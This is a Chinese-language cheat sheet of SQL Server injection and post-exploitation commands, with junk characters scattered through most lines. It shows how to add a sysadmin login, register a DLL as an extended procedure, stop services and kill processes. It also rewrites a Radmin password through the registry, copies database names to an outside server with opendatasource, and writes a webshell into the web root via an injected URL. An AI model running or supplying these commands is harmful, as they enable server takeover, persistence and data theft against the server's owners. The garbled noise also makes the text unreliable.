exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
) u, ]/ e/ L3 A% r8 i 读取目录内容 b" K9 b' l$ T7 E' D8 r
exec master..xp_dirtree 'c:\winnt\system32\',1,1/ J! R1 R* [8 E. U3 p l
数据库备份" t2 R- n# I* ^
backup database pubs to disk = 'c:\123.bak'
9 @7 l Q r( v //爆出长度, q- K. S _6 m3 @7 H
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--2 e2 F8 ^" S7 I8 b3 E2 L1 b# }
更改sa口令方法:用sql综合利用工具连接后,执行命令:
. z+ ]; V- `! f# w exec sp_password NULL,'新密码','sa'[nextapge]& l5 Y' x1 Y9 I' S
添加和删除一个SA权限的用户test:9 w. |+ [: a, w5 P" Y
exec master.dbo.sp_addlogin test,ptlove
9 i- M& u: U% X9 W exec master.dbo.sp_addsrvrolemember test,sysadmin
! R& h# W8 o) ^* P 删除扩展存储过过程xp_cmdshell的语句:
% P+ b" }. s& x5 @% B: k, N8 ^- ~ exec sp_dropextendedproc 'xp_cmdshell'7 T9 v: ]# _+ G' C2 s
添加扩展存储过过程
8 \7 x' ^9 |) x4 K EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
) e! ?% b/ Q% i' {$ o# _/ a6 T GRANT exec On xp_proxiedadata TO public
6 q$ M' `/ K3 g0 j6 F$ D; m4 Z 停掉或激活某个服务。
& ~# I$ q2 B* L* [ exec master..xp_servicecontrol 'stop','schedule'
; f$ E; v/ T& v exec master..xp_servicecontrol 'start','schedule'# Q$ ?8 ?7 ]2 V, N+ q1 n
dbo.xp_subdirs7 v$ @% S' C) U4 u4 b3 a
只列某个目录下的子目录。2 f9 A% X0 t: D0 ? d4 m8 ~
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
s7 j& C" I3 V. C/ ]" N h. r dbo.xp_makecab
6 v9 Y$ E+ E7 | 将目标多个档案压缩到某个目标档案之内。/ C! h/ ^/ v" p! M- d6 Q0 K1 R# B& u
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。
5 S0 Y p" i6 S/ q& |3 a8 U dbo.xp_makecab
% X+ Z, {6 V. J% | _7 P 'c:\test.cab','mszip',1,0 u, @8 U) A( o, H9 Z
'C:\Inetpub\wwwroot\SQLInject\login.asp',) Z& L( w2 H2 T& Q0 k2 H0 f
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
, @/ S8 c g4 A a xp_terminate_process
5 T+ p1 d& W# S( Y7 q( _ 停掉某个执行中的程序,但赋予的参数是 Process ID。$ t! D& N p8 v0 p( O+ U
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID- F* [- z$ G/ B. @1 S
xp_terminate_process 2484
4 U2 m% x+ k' X& W5 _; M, V xp_unpackcab
% O9 A4 `0 ^% u. E$ ]" A! A 解开压缩档。& c7 ^* I; F# f0 M
xp_unpackcab 'c:\test.cab','c:\temp',1
# t/ X6 K& B& z! }* U: _ 某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
" A* O1 r3 \, F4 ^ create database lcx;9 ]: v9 a7 g2 C. z5 Y" _4 I
Create TABLE ku(name nvarchar(256) null);
5 ?6 |5 t# U+ F3 M' \# ]* @ Create TABLE biao(id int NULL,name nvarchar(256) null);, X8 [; Z( |5 ?
//得到数据库名
# s, J0 N. `8 Y6 w+ W7 D3 Q% s insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
0 w, h6 p0 q' o8 g2 j+ J //在Master中创建表,看看权限怎样
( o2 Q7 k9 Q% E% j a( G+ V Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
7 _2 M3 J, X8 q/ I9 m' D; P 用 sp_makewebtask直接在web目录里写入一句话马:2 w) G2 M) U [6 x9 ^6 ^
<A href="http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''''%20'">http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''''%20';--
/ k/ @( r5 H# [6 D //更新表内容
. l5 x7 K, t7 A Update films SET kind = 'Dramatic' Where id = 1233 z# Q g% J0 n) x
//删除内容
5 o, j, E/ f4 e; w o" j delete from table_name where Stockid = 3 |